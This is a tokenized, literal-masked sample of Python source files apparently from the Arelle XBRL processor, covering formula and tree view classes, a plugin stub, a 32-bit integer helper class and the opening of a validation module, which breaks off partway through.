memQNames </s>
<s> '''<STR_LIT>''' <EOL> from arelle import ModelObject , XbrlConst , ViewFile <EOL> from arelle . ModelDtsObject import ModelRelationship <EOL> from arelle . ModelFormulaObject import ModelParameter , ModelVariable , ModelVariableSetAssertion , ModelConsistencyAssertion <EOL> from arelle . ViewUtilFormulae import rootFormulaObjects , formulaObjSortKey <EOL> import os <EOL> def viewFormulae ( modelXbrl , outfile , header , lang = None ) : <EOL> modelXbrl . modelManager . showStatus ( _ ( "<STR_LIT>" ) ) <EOL> view = ViewFormulae ( modelXbrl , outfile , header , lang ) <EOL> view . view ( ) <EOL> view . close ( ) <EOL> class ViewFormulae ( ViewFile . View ) : <EOL> def __init__ ( self , modelXbrl , outfile , header , lang ) : <EOL> super ( ViewFormulae , self ) . __init__ ( modelXbrl , outfile , header , lang ) <EOL> def view ( self ) : <EOL> rootObjects = rootFormulaObjects ( self ) <EOL> self . treeCols = <NUM_LIT:0> <EOL> for rootObject in rootObjects : <EOL> self . treeDepth ( rootObject , <NUM_LIT:1> , set ( ) ) <EOL> self . addRow ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , asHeader = True ) <EOL> for rootObject in sorted ( rootObjects , key = formulaObjSortKey ) : <EOL> self . viewFormulaObjects ( rootObject , None , <NUM_LIT:0> , set ( ) ) <EOL> for cfQnameArity in sorted ( qnameArity <EOL> for qnameArity in self . modelXbrl . modelCustomFunctionSignatures . keys ( ) <EOL> if isinstance ( qnameArity , ( tuple , list ) ) ) : <EOL> cfObject = self . modelXbrl . modelCustomFunctionSignatures [ cfQnameArity ] <EOL> self . viewFormulaObjects ( cfObject , None , <NUM_LIT:0> , set ( ) ) <EOL> def treeDepth ( self , fromObject , indent , visited ) : <EOL> if fromObject is None : <EOL> return <EOL> if indent > self . treeCols : self . treeCols = indent <EOL> if fromObject not in visited : <EOL> visited . add ( fromObject ) <EOL> relationshipArcsShown = set ( ) <EOL> for relationshipSet in ( self . varSetFilterRelationshipSet , <EOL> self . allFormulaRelationshipsSet ) : <EOL> for modelRel in relationshipSet . fromModelObject ( fromObject ) : <EOL> if modelRel . arcElement not in relationshipArcsShown : <EOL> relationshipArcsShown . add ( modelRel . arcElement ) <EOL> toObject = modelRel . toModelObject <EOL> self . treeDepth ( toObject , indent + <NUM_LIT:1> , visited ) <EOL> visited . remove ( fromObject ) <EOL> def viewFormulaObjects ( self , fromObject , fromRel , indent , visited ) : <EOL> if fromObject is None : <EOL> return <EOL> if isinstance ( fromObject , ( ModelVariable , ModelParameter ) ) and fromRel is not None : <EOL> text = "<STR_LIT>" . format ( fromObject . localName , fromRel . variableQname ) <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) , "<STR_LIT:name>" : str ( fromRel . variableQname ) } <EOL> elif isinstance ( fromObject , ( ModelVariableSetAssertion , ModelConsistencyAssertion ) ) : <EOL> text = "<STR_LIT>" . format ( fromObject . localName , fromObject . id ) <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) , "<STR_LIT:id>" : str ( fromObject . id ) } <EOL> else : <EOL> text = fromObject . localName <EOL> xmlRowEltAttr = { "<STR_LIT:type>" : str ( fromObject . localName ) } <EOL> cols = [ text , fromObject . xlinkLabel ] <EOL> if fromRel is not None and fromRel . elementQname == XbrlConst . qnVariableFilterArc : <EOL> cols . append ( "<STR_LIT:true>" if fromRel . isCovered else "<STR_LIT:false>" ) <EOL> cols . append ( "<STR_LIT:true>" if fromRel . isComplemented else "<STR_LIT:false>" ) <EOL> else : <EOL> cols . append ( None ) <EOL> cols . append ( None ) <EOL> if isinstance ( fromObject , ModelVariable ) : <EOL> cols . append ( fromObject . bindAsSequence ) <EOL> else : <EOL> cols . append ( None ) <EOL> if hasattr ( fromObject , "<STR_LIT>" ) : <EOL> cols . append ( fromObject . viewExpression ) <EOL> else : <EOL> cols . append ( None ) <EOL> self . addRow ( cols , treeIndent = indent , xmlRowElementName = "<STR_LIT>" , xmlRowEltAttr = xmlRowEltAttr , xmlCol0skipElt = True ) <EOL> if fromObject not in visited : <EOL> visited . add ( fromObject ) <EOL> relationshipArcsShown = set ( ) <EOL> for relationshipSet in ( self . varSetFilterRelationshipSet , <EOL> self . allFormulaRelationshipsSet ) : <EOL> for modelRel in relationshipSet . fromModelObject ( fromObject ) : <EOL> if modelRel . arcElement not in relationshipArcsShown : <EOL> relationshipArcsShown . add ( modelRel . arcElement ) <EOL> toObject = modelRel . toModelObject <EOL> self . viewFormulaObjects ( toObject , modelRel , indent + <NUM_LIT:1> , visited ) <EOL> visited . remove ( fromObject ) </s>
<s> '''<STR_LIT>''' <EOL> from tkinter import * <EOL> try : <EOL> from tkinter . ttk import * <EOL> except ImportError : <EOL> from ttk import * <EOL> from arelle . CntlrWinTooltip import ToolTip <EOL> import os <EOL> class ViewTree : <EOL> def __init__ ( self , modelXbrl , tabWin , tabTitle , hasToolTip = False , lang = None ) : <EOL> self . tabWin = tabWin <EOL> self . viewFrame = Frame ( tabWin ) <EOL> self . viewFrame . view = self <EOL> self . viewFrame . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> tabWin . add ( self . viewFrame , text = tabTitle ) <EOL> self . tabTitle = tabTitle <EOL> vScrollbar = Scrollbar ( self . viewFrame , orient = VERTICAL ) <EOL> hScrollbar = Scrollbar ( self . viewFrame , orient = HORIZONTAL ) <EOL> self . treeView = Treeview ( self . viewFrame , xscrollcommand = hScrollbar . set , yscrollcommand = vScrollbar . set ) <EOL> self . treeView . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:0> , sticky = ( N , S , E , W ) ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = "<STR_LIT>" ) <EOL> if modelXbrl . modelManager . cntlr . isMac or modelXbrl . modelManager . cntlr . isMSW : <EOL> highlightColor = "<STR_LIT>" % self . treeView . winfo_rgb ( "<STR_LIT>" ) <EOL> else : <EOL> highlightColor = "<STR_LIT>" <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeView . tag_configure ( "<STR_LIT>" , background = highlightColor ) <EOL> self . treeViewSelection = ( ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . viewSelectionChange , '<STR_LIT:+>' ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . onViewClick , '<STR_LIT:+>' ) <EOL> hScrollbar [ "<STR_LIT>" ] = self . treeView . xview <EOL> hScrollbar . grid ( row = <NUM_LIT:1> , column = <NUM_LIT:0> , sticky = ( E , W ) ) <EOL> vScrollbar [ "<STR_LIT>" ] = self . treeView . yview <EOL> vScrollbar . grid ( row = <NUM_LIT:0> , column = <NUM_LIT:1> , sticky = ( N , S ) ) <EOL> self . viewFrame . columnconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . viewFrame . rowconfigure ( <NUM_LIT:0> , weight = <NUM_LIT:1> ) <EOL> self . modelXbrl = modelXbrl <EOL> self . hasToolTip = hasToolTip <EOL> self . toolTipText = StringVar ( ) <EOL> if hasToolTip : <EOL> self . treeView . bind ( "<STR_LIT>" , self . motion , '<STR_LIT:+>' ) <EOL> self . treeView . bind ( "<STR_LIT>" , self . leave , '<STR_LIT:+>' ) <EOL> self . toolTipText = StringVar ( ) <EOL> self . toolTip = ToolTip ( self . treeView , <EOL> textvariable = self . toolTipText , <EOL> wraplength = <NUM_LIT> , <EOL> follow_mouse = True , <EOL> state = "<STR_LIT>" ) <EOL> self . toolTipColId = None <EOL> self . toolTipRowId = None <EOL> self . modelXbrl = modelXbrl <EOL> self . lang = lang <EOL> self . labelrole = None <EOL> self . nameIsPrefixed = False <EOL> if modelXbrl : <EOL> modelXbrl . views . append ( self ) <EOL> if not lang : <EOL> self . lang = modelXbrl . modelManager . defaultLang <EOL> def clearTreeView ( self ) : <EOL> self . treeViewSelection = ( ) <EOL> for node in self . treeView . get_children ( ) : <EOL> self . treeView . delete ( node ) <EOL> def viewSelectionChange ( self , event = None ) : <EOL> for node in self . treeViewSelection : <EOL> if self . treeView . exists ( node ) : <EOL> priorTags = self . treeView . item ( node ) [ "<STR_LIT>" ] <EOL> if priorTags : <EOL> priorBgTag = priorTags [ <NUM_LIT:0> ] <EOL> if priorBgTag . startswith ( "<STR_LIT>" ) : <EOL> self . treeView . item ( node , tags = ( priorBgTag [ <NUM_LIT:9> : ] , ) ) <EOL> self . treeViewSelection = self . treeView . selection ( ) <EOL> for node in self . treeViewSelection : <EOL> priorTags = self . treeView . item ( node ) [ "<STR_LIT>" ] <EOL> if priorTags : <EOL> self . treeView . item ( node , tags = ( "<STR_LIT>" + priorTags [ <NUM_LIT:0> ] , ) ) <EOL> def onViewClick ( self , * args ) : <EOL> self . modelXbrl . modelManager . cntlr . currentView = self <EOL> def close ( self ) : <EOL> del self . viewFrame . view <EOL> if self . modelXbrl : <EOL> self . tabWin . forget ( self . viewFrame ) <EOL> self . modelXbrl . views . remove ( self ) <EOL> self . modelXbrl = None <EOL> self . view = None <EOL> def select ( self ) : <EOL> self . tabWin . select ( self . viewFrame ) <EOL> def leave ( self , * args ) : <EOL> self . toolTipColId = None <EOL> self . toolTipRowId = None <EOL> def motion ( self , * args ) : <EOL> tvColId = self . treeView . identify_column ( args [ <NUM_LIT:0> ] . x ) <EOL> tvRowId = self . treeView . identify_row ( args [ <NUM_LIT:0> ] . y ) <EOL> if tvColId != self . toolTipColId or tvRowId != self . toolTipRowId : <EOL> self . toolTipColId = tvColId <EOL> self . toolTipRowId = tvRowId <EOL> newValue = self . getToolTip ( tvRowId , tvColId ) <EOL> if newValue is None and tvRowId and len ( tvRowId ) > <NUM_LIT:0> : <EOL> try : <EOL> col = int ( tvColId [ <NUM_LIT:1> : ] ) <EOL> if col == <NUM_LIT:0> : <EOL> newValue = self . treeView . item ( tvRowId , "<STR_LIT:text>" ) <EOL> else : <EOL> values = self . treeView . item ( tvRowId , "<STR_LIT>" ) <EOL> if col <= len ( values ) : <EOL> newValue = values [ col - <NUM_LIT:1> ] <EOL> except ValueError : <EOL> pass <EOL> self . setToolTip ( newValue , tvColId ) <EOL> def getToolTip ( self , rowId , colId ) : <EOL> return None <EOL> def setToolTip ( self , text , colId = "<STR_LIT>" ) : <EOL> self . toolTip . _hide ( ) <EOL> if isinstance ( text , str ) and len ( text ) > <NUM_LIT:0> : <EOL> width = self . treeView . column ( colId , "<STR_LIT:width>" ) <EOL> if len ( text ) * <NUM_LIT:8> > width or '<STR_LIT:\n>' in text : <EOL> self . toolTipText . set ( text ) <EOL> self . toolTip . configure ( state = "<STR_LIT>" ) <EOL> self . toolTip . _schedule ( ) <EOL> else : <EOL> self . toolTipText . set ( "<STR_LIT>" ) <EOL> self . toolTip . configure ( state = "<STR_LIT>" ) <EOL> else : <EOL> self . toolTipText . set ( "<STR_LIT>" ) <EOL> self . toolTip . configure ( state = "<STR_LIT>" ) <EOL> def contextMenu ( self ) : <EOL> try : <EOL> return self . menu <EOL> except AttributeError : <EOL> try : <EOL> self . menu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . treeView . bind ( self . modelXbrl . modelManager . cntlr . contextMenuClick , self . popUpMenu , '<STR_LIT:+>' ) <EOL> return self . menu <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> return None <EOL> def popUpMenu ( self , event ) : <EOL> if self . menu : <EOL> self . menuRow = self . treeView . identify_row ( event . y ) <EOL> self . menuCol = self . treeView . identify_column ( event . x ) <EOL> self . menu . post ( event . x_root , event . y_root ) <EOL> def expand ( self ) : <EOL> self . setTreeItemOpen ( self . menuRow , open = True ) <EOL> def expandAll ( self ) : <EOL> self . setTreeItemOpen ( "<STR_LIT>" , open = True ) <EOL> def collapse ( self ) : <EOL> self . setTreeItemOpen ( self . menuRow , open = False ) <EOL> def collapseAll ( self ) : <EOL> self . setTreeItemOpen ( "<STR_LIT>" , open = False ) <EOL> def setTreeItemOpen ( self , node , open = True ) : <EOL> if node : <EOL> self . treeView . item ( node , open = open ) <EOL> for childNode in self . treeView . get_children ( node ) : <EOL> self . setTreeItemOpen ( childNode , open ) <EOL> def menuAddExpandCollapse ( self ) : <EOL> if self . menu : <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . expand ) <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . collapse ) <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . expandAll ) <EOL> self . menu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . collapseAll ) <EOL> def menuAddClipboard ( self ) : <EOL> if self . menu and self . modelXbrl . modelManager . cntlr . hasClipboard : <EOL> try : <EOL> clipboardMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyCellToClipboard ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyRowToClipboard ) <EOL> clipboardMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . copyTableToClipboard ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = clipboardMenu , underline = <NUM_LIT:0> ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddLangs ( self ) : <EOL> if self . menu : <EOL> try : <EOL> langsMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = langsMenu , underline = <NUM_LIT:0> ) <EOL> for lang in sorted ( self . modelXbrl . langs ) : <EOL> langsMenu . add_command ( label = lang , underline = <NUM_LIT:0> , command = lambda l = lang : self . setLang ( l ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddLabelRoles ( self , includeConceptName = False , menulabel = None ) : <EOL> if self . menu : <EOL> try : <EOL> if menulabel is None : menulabel = _ ( "<STR_LIT>" ) <EOL> rolesMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = menulabel , menu = rolesMenu , underline = <NUM_LIT:0> ) <EOL> from arelle . ModelRelationshipSet import labelroles <EOL> for x in labelroles ( self . modelXbrl , includeConceptName ) : <EOL> rolesMenu . add_command ( label = x [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] , underline = <NUM_LIT:0> , command = lambda a = x [ <NUM_LIT:1> ] : self . setLabelrole ( a ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddNameStyle ( self , menulabel = None ) : <EOL> if self . menu : <EOL> try : <EOL> if menulabel is None : menulabel = _ ( "<STR_LIT>" ) <EOL> nameStyleMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = menulabel , menu = nameStyleMenu , underline = <NUM_LIT:0> ) <EOL> from arelle . ModelRelationshipSet import labelroles <EOL> nameStyleMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda a = True : self . setNamestyle ( a ) ) <EOL> nameStyleMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda a = False : self . setNamestyle ( a ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddUnitDisplay ( self ) : <EOL> if self . menu : <EOL> try : <EOL> rolesMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = rolesMenu , underline = <NUM_LIT:0> ) <EOL> rolesMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . setUnitDisplay ( unitDisplayID = True ) ) <EOL> rolesMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . setUnitDisplay ( unitDisplayID = False ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddViews ( self , addClose = True , tabWin = None ) : <EOL> if self . menu : <EOL> try : <EOL> if tabWin is None : tabWin = self . tabWin <EOL> viewMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = viewMenu , underline = <NUM_LIT:0> ) <EOL> newViewsMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> if addClose : <EOL> viewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . close ) <EOL> viewMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = newViewsMenu , underline = <NUM_LIT:0> ) <EOL> newViewsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . newArcroleGroupView ( tabWin ) ) <EOL> from arelle . ModelRelationshipSet import baseSetArcroles <EOL> for x in baseSetArcroles ( self . modelXbrl ) + [ ( "<STR_LIT>" , "<STR_LIT>" ) , ( "<STR_LIT>" , "<STR_LIT>" ) ] : <EOL> newViewsMenu . add_command ( label = x [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] , underline = <NUM_LIT:0> , command = lambda a = x [ <NUM_LIT:1> ] : self . newView ( a , tabWin ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def newView ( self , arcrole , tabWin ) : <EOL> if arcrole in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> from arelle import ViewWinRoleTypes <EOL> ViewWinRoleTypes . viewRoleTypes ( self . modelXbrl , tabWin , arcrole == "<STR_LIT>" , lang = self . lang ) <EOL> else : <EOL> from arelle import ViewWinRelationshipSet <EOL> ViewWinRelationshipSet . viewRelationshipSet ( self . modelXbrl , tabWin , arcrole , lang = self . lang ) <EOL> def newArcroleGroupView ( self , tabWin ) : <EOL> from arelle . DialogArcroleGroup import getArcroleGroup <EOL> from arelle import ViewWinRelationshipSet <EOL> arcroleGroup = getArcroleGroup ( self . modelXbrl . modelManager . cntlr , self . modelXbrl ) <EOL> if arcroleGroup : <EOL> ViewWinRelationshipSet . viewRelationshipSet ( self . modelXbrl , tabWin , arcroleGroup , lang = self . lang ) <EOL> def setLang ( self , lang ) : <EOL> self . lang = lang <EOL> self . view ( ) <EOL> def setLabelrole ( self , labelrole ) : <EOL> self . labelrole = labelrole <EOL> self . view ( ) <EOL> def setNamestyle ( self , isPrefixed ) : <EOL> self . nameIsPrefixed = isPrefixed <EOL> self . view ( ) <EOL> def setUnitDisplay ( self , unitDisplayID = False ) : <EOL> self . unitDisplayID = unitDisplayID <EOL> self . view ( ) <EOL> def setColumnsSortable ( self , treeColIsInt = False , startUnsorted = False , initialSortCol = "<STR_LIT>" , initialSortDirForward = True ) : <EOL> if hasattr ( self , '<STR_LIT>' ) and self . lastSortColumn : <EOL> self . treeView . heading ( self . lastSortColumn , image = self . sortImages [ <NUM_LIT:2> ] ) <EOL> self . lastSortColumn = None if startUnsorted else initialSortCol <EOL> self . lastSortColumnForward = initialSortDirForward <EOL> self . treeColIsInt = treeColIsInt <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> self . sortImages = ( PhotoImage ( file = os . path . join ( self . modelXbrl . modelManager . cntlr . imagesDir , "<STR_LIT>" ) ) , <EOL> PhotoImage ( file = os . path . join ( self . modelXbrl . modelManager . cntlr . imagesDir , "<STR_LIT>" ) ) , <EOL> PhotoImage ( ) ) <EOL> for col in ( "<STR_LIT>" , ) + self . treeView [ "<STR_LIT>" ] : <EOL> self . treeView . heading ( col , command = lambda c = col : self . sortColumn ( c ) ) <EOL> if not startUnsorted : <EOL> self . treeView . heading ( initialSortCol , image = self . sortImages [ not initialSortDirForward ] ) <EOL> def colSortVal ( self , node , col ) : <EOL> if col == "<STR_LIT>" : <EOL> treeColVal = self . treeView . item ( node ) [ "<STR_LIT:text>" ] <EOL> if self . treeColIsInt : <EOL> return int ( treeColVal ) <EOL> else : <EOL> treeColVal = self . treeView . set ( node , col ) <EOL> if col == "<STR_LIT>" : <EOL> try : <EOL> return int ( treeColVal ) <EOL> except : <EOL> return <NUM_LIT:0> <EOL> return treeColVal <EOL> def sortNestedRows ( self , parentNode , col , reverse ) : <EOL> l = [ ( self . colSortVal ( node , col ) , node ) for node in self . treeView . get_children ( parentNode ) ] <EOL> l . sort ( reverse = reverse ) <EOL> for i , ( cell , node ) in enumerate ( l ) : <EOL> self . treeView . move ( node , parentNode , i ) <EOL> for i , node in enumerate ( self . treeView . get_children ( parentNode ) ) : <EOL> self . treeView . item ( node , tags = ( '<STR_LIT>' if i & <NUM_LIT:1> else '<STR_LIT>' , ) ) <EOL> self . sortNestedRows ( node , col , reverse ) <EOL> def sortColumn ( self , col ) : <EOL> if col == self . lastSortColumn : <EOL> reverse = self . lastSortColumnForward <EOL> self . lastSortColumnForward = not reverse <EOL> else : <EOL> if self . lastSortColumn : <EOL> self . treeView . heading ( self . lastSortColumn , image = self . sortImages [ <NUM_LIT:2> ] ) <EOL> reverse = False <EOL> self . lastSortColumnForward = True <EOL> self . lastSortColumn = col <EOL> self . treeView . heading ( col , image = self . sortImages [ reverse ] ) <EOL> self . sortNestedRows ( '<STR_LIT>' , col , reverse ) <EOL> self . viewSelectionChange ( ) <EOL> def copyCellToClipboard ( self , * ignore ) : <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( <EOL> text = self . treeView . item ( self . menuRow ) [ '<STR_LIT:text>' ] if self . menuCol == '<STR_LIT>' else self . treeView . set ( self . menuRow , self . menuCol ) ) <EOL> def copyRowToClipboard ( self , * ignore ) : <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( <EOL> text = '<STR_LIT:\t>' . join ( [ self . treeView . item ( self . menuRow ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . set ( self . menuRow , c ) for c in self . treeView [ '<STR_LIT>' ] ] ) ) <EOL> def copyTableToClipboard ( self , * ignore ) : <EOL> cols = self . treeView [ '<STR_LIT>' ] <EOL> lines = [ '<STR_LIT:\t>' . join ( [ self . treeView . heading ( '<STR_LIT>' ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . heading ( h ) [ '<STR_LIT:text>' ] for h in cols ] ) ] <EOL> self . tabLines ( '<STR_LIT>' , '<STR_LIT>' , cols , lines ) <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( text = '<STR_LIT:\n>' . join ( lines ) ) <EOL> def tabLines ( self , parentNode , indent , cols , lines ) : <EOL> for node in self . treeView . get_children ( parentNode ) : <EOL> lines . append ( '<STR_LIT:\t>' . join ( [ indent + self . treeView . item ( node ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . set ( node , c ) for c in cols ] ) ) <EOL> self . tabLines ( node , indent + '<STR_LIT:U+0020>' , cols , lines ) </s>
<s> '''<STR_LIT>''' <EOL> def foo ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> __pluginInfo__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : foo , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } </s>
<s> C = <NUM_LIT> <EOL> def norm ( n ) : <EOL> return n & <NUM_LIT> <EOL> class U32 : <EOL> v = <NUM_LIT:0> <EOL> def __init__ ( self , value = <NUM_LIT:0> ) : <EOL> self . v = C + norm ( abs ( int ( value ) ) ) <EOL> def set ( self , value = <NUM_LIT:0> ) : <EOL> self . v = C + norm ( abs ( int ( value ) ) ) <EOL> def __repr__ ( self ) : <EOL> return hex ( norm ( self . v ) ) <EOL> def __long__ ( self ) : return int ( norm ( self . v ) ) <EOL> def __int__ ( self ) : return int ( norm ( self . v ) ) <EOL> def __chr__ ( self ) : return chr ( norm ( self . v ) ) <EOL> def __add__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v + b . v ) <EOL> return r <EOL> def __sub__ ( self , b ) : <EOL> r = U32 ( ) <EOL> if self . v < b . v : <EOL> r . v = C + norm ( <NUM_LIT> - ( b . v - self . v ) ) <EOL> else : r . v = C + norm ( self . v - b . v ) <EOL> return r <EOL> def __mul__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v * b . v ) <EOL> return r <EOL> def __div__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) / norm ( b . v ) ) <EOL> return r <EOL> def __mod__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) % norm ( b . v ) ) <EOL> return r <EOL> def __neg__ ( self ) : return U32 ( self . v ) <EOL> def __pos__ ( self ) : return U32 ( self . v ) <EOL> def __abs__ ( self ) : return U32 ( self . v ) <EOL> def __invert__ ( self ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( ~ self . v ) <EOL> return r <EOL> def __lshift__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v << b ) <EOL> return r <EOL> def __rshift__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) >> b ) <EOL> return r <EOL> def __and__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v & b . v ) <EOL> return r <EOL> def __or__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v | b . v ) <EOL> return r <EOL> def __xor__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v ^ b . v ) <EOL> return r <EOL> def __not__ ( self ) : <EOL> return U32 ( not norm ( self . v ) ) <EOL> def truth ( self ) : <EOL> return norm ( self . v ) <EOL> def __cmp__ ( self , b ) : <EOL> if norm ( self . v ) > norm ( b . v ) : return <NUM_LIT:1> <EOL> elif norm ( self . v ) < norm ( b . v ) : return - <NUM_LIT:1> <EOL> else : return <NUM_LIT:0> <EOL> def __bool__ ( self ) : <EOL> return norm ( self . v ) </s>
<s> '''<STR_LIT>''' <EOL> import os , sys , re <EOL> from arelle import PluginManager <EOL> from arelle import ModelDocument , XbrlConst , XmlUtil , UrlUtil , LeiUtil <EOL> from arelle . HashUtil import md5hash , Md5Sum <EOL> from arelle . ModelDtsObject import ModelConcept , ModelType , ModelLocator , ModelResource <EOL> from arelle . ModelFormulaObject import Aspect <EOL> from arelle . ModelObject import ModelObject <EOL> from arelle . ModelRelationshipSet import ModelRelationshipSet <EOL> from arelle . ModelValue import qname , qnameEltPfxName <EOL> from arelle . ValidateUtr import ValidateUtr <EOL> from arelle . XbrlConst import qnEnumerationItemType <EOL> try : <EOL> import regex as re <EOL> except ImportError : <EOL> import re <EOL> from lxml import etree <EOL> from collections import defaultdict <EOL> qnFIndicators = qname ( "<STR_LIT>" ) <EOL> qnFilingIndicator = qname ( "<STR_LIT>" ) <EOL> qnPercentItemType = qname ( "<STR_LIT>" ) <EOL> qnPureItemType = qname ( "<STR_LIT>" ) <EOL> qnMetReportingCurrency = qname ( "<STR_LIT>" ) <EOL> integerItemTypes = { "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> schemaRefDatePattern = re . compile ( r"<STR_LIT>" ) <EOL> s_2_18_c_a_met = { <EOL> """<STR_LIT>""" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> 